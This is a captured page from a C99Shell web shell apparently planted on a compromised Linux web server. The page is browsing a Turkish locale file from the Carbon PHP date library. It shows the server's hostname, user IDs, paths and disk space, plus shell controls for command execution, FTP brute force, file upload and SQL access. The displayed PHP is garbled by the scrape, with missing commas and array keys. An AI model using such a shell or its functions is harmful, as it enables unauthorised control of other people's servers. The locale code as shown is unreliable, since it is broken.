!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/vendor/nesbot/carbon/src/Carbon/Lang/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     tr.php (3.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of the Carbon package.
 *
 * (c) Brian Nesbitt <brian@nesbot.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/*
 * Authors:
 * - Josh Soref
 * - Alan Agius
 * - Erhan Gundogan
 * - François B
 * - JD Isaacks
 * - Murat Yüksel
 * - Baran Şengül
 * - Selami (selamialtin)
 * - TeomanBey
 */
return [
    
'year' => ':count yıl',
    
'a_year' => '{1}bir yıl|]1,Inf[:count yıl',
    
'y' => ':county',
    
'month' => ':count ay',
    
'a_month' => '{1}bir ay|]1,Inf[:count ay',
    
'm' => ':countay',
    
'week' => ':count hafta',
    
'a_week' => '{1}bir hafta|]1,Inf[:count hafta',
    
'w' => ':counth',
    
'day' => ':count gün',
    
'a_day' => '{1}bir gün|]1,Inf[:count gün',
    
'd' => ':countg',
    
'hour' => ':count saat',
    
'a_hour' => '{1}bir saat|]1,Inf[:count saat',
    
'h' => ':countsa',
    
'minute' => ':count dakika',
    
'a_minute' => '{1}bir dakika|]1,Inf[:count dakika',
    
'min' => ':countdk',
    
'second' => ':count saniye',
    
'a_second' => '{1}birkaç saniye|]1,Inf[:count saniye',
    
's' => ':countsn',
    
'ago' => ':time önce',
    
'from_now' => ':time sonra',
    
'after' => ':time sonra',
    
'before' => ':time önce',
    
'diff_now' => 'şimdi',
    
'diff_today' => 'bugün',
    
'diff_today_regexp' => 'bugün(?:\\s+saat)?',
    
'diff_yesterday' => 'dün',
    
'diff_tomorrow' => 'yarın',
    
'diff_tomorrow_regexp' => 'yarın(?:\\s+saat)?',
    
'diff_before_yesterday' => 'evvelsi gün',
    
'diff_after_tomorrow' => 'öbür gün',
    
'formats' => [
        
'LT' => 'HH:mm',
        
'LTS' => 'HH:mm:ss',
        
'L' => 'DD.MM.YYYY',
        
'LL' => 'D MMMM YYYY',
        
'LLL' => 'D MMMM YYYY HH:mm',
        
'LLLL' => 'dddd, D MMMM YYYY HH:mm',
    ],
    
'calendar' => [
        
'sameDay' => '[bugün saat] LT',
        
'nextDay' => '[yarın saat] LT',
        
'nextWeek' => '[gelecek] dddd [saat] LT',
        
'lastDay' => '[dün] LT',
        
'lastWeek' => '[geçen] dddd [saat] LT',
        
'sameElse' => 'L',
    ],
    
'ordinal' => function ($number$period) {
        switch (
$period) {
            case 
'd':
            case 
'D':
            case 
'Do':
            case 
'DD':
                return 
$number;
            default:
                if (
$number === 0) {  // special case for zero
                    
return "$number'ıncı";
                }

                static 
$suffixes = [
                    
=> '\'inci',
                    
=> '\'inci',
                    
=> '\'inci',
                    
70 => '\'inci',
                    
80 => '\'inci',
                    
=> '\'nci',
                    
=> '\'nci',
                    
20 => '\'nci',
                    
50 => '\'nci',
                    
=> '\'üncü',
                    
=> '\'üncü',
                    
100 => '\'üncü',
                    
=> '\'ncı',
                    
=> '\'uncu',
                    
10 => '\'uncu',
                    
30 => '\'uncu',
                    
60 => '\'ıncı',
                    
90 => '\'ıncı',
                ];

                
$lastDigit $number 10;

                return 
$number.($suffixes[$lastDigit] ?? $suffixes[$number 100 $lastDigit] ?? $suffixes[$number >= 100 100 : -1] ?? '');
        }
    },
    
'meridiem' => ['ÖÖ''ÖS''öö''ös'],
    
'months' => ['Ocak''Şubat''Mart''Nisan''Mayıs''Haziran''Temmuz''Ağustos''Eylül''Ekim''Kasım''Aralık'],
    
'months_short' => ['Oca''Şub''Mar''Nis''May''Haz''Tem''Ağu''Eyl''Eki''Kas''Ara'],
    
'weekdays' => ['Pazar''Pazartesi''Salı''Çarşamba''Perşembe''Cuma''Cumartesi'],
    
'weekdays_short' => ['Paz''Pts''Sal''Çar''Per''Cum''Cts'],
    
'weekdays_min' => ['Pz''Pt''Sa''Ça''Pe''Cu''Ct'],
    
'first_day_of_week' => 1,
    
'day_of_first_week_of_year' => 1,
    
'list' => [', '' ve '],
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--